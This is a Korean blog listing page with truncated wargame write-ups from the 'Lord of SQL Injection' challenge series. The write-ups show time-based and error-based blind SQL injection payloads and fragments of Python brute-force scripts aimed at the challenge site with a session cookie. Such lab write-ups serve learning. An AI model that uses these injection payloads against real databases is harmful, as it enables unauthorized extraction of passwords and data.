webhacking/load of sql injection
-
[load of sql injection] umaruwebhacking/load of sql injection 2018. 11. 22. 00:09
Time based blind sql injectionupdate 구문에서 싱글쿼터없이 flag값을 변경하려한다. 이때 or은 사용할 수 없다. =1 or sleep(5) 라면 sleep이 되기전에 1이 참?으로 이미 인식되기 때문이다. update명령어는 그렇다. 그래서 and로 시작 하는게 좋다.(select 1 union select (ord(substring( flag from 1 for 2))>10 and sleep(5)) -> flag 첫 번째 값이 10보다 크다는게 참이면 뒤에 sleep을 실행하고 0을반환하여 오류를 낸다. 이 문제는 무조건 오류를 내어 값이 변하지 않도록 하는 것이 관건이다.python time모듈 중요sleep(5) -> 5초를 샌다.substring( flag from..
-
-
-
[load of sql injection] dark_eyeswebhacking/load of sql injection 2018. 11. 20. 14:22
Error based blind sql injection[조건] or [에러]' or 1=1 order by (select ord(substr(pw,1,1))>10) %23* ?pw=' or id='admin' and (select 1 union select (ord(substr(pw,1,1))=53))%23 왜 반환 행이 2개면 오류가 나야되는가import requests url = "https://los.eagle-jump.org/dark_eyes_a7f01583a2ab681dc71e5fd3a40c0bd4.php"cookies = { "PHPSESSID" : "uu98um35otu07audr4q491v6j3" } ## 세션 ID list1 = [] for k in range( 1, 12 ): for ..
-
[load of sql injection] iron_golemwebhacking/load of sql injection 2018. 11. 18. 15:41
Error Blind Sql Injection 기법' or 1=1 order by 1 # -> 컬럼 행 갯수를 알 수 있다. * 행 갯수 아는 방법 알아보기' or if(ord(substr(pw,1,1))=30,1,(select 1 union select 2))' or if(ascii(substr(pw,1,1))=30,1,(select 1 union select 2)) 서로 차이점은? import requests url = "https://los.eagle-jump.org/iron_golem_d54668ae66cb6f43e92468775b1d1e38.php"cookies = { "PHPSESSID" : "uu98um35otu07audr4q491v6j3" } ## 세션 ID list1 = [] for k ..
-
[load of sql injection] xaviswebhacking/load of sql injection 2018. 11. 17. 17:40
PW가 ASCII 문자가 아니라 멀티바이트 문자형식이다.ASCII(SUBSTR(PW,1,1))=97 -> ASCII테이블의 표현 값을 넘어서 반환 값은 NULL이다.ORD(SUBSTR(PW,1,1)=97 -> 멀티바이트단위까지 비교 할 수 있다.Solve code:import requests url = "https://los.eagle-jump.org/xavis_fd4389515d6540477114ec3c79623afe.php"cookies = { "PHPSESSID" : "uu98um35otu07audr4q491v6j3" } ## 세션 ID list1 = [] for i in range(0,100): text = "' or id='admin' and length(pw)="+str(i)+" -- " pa..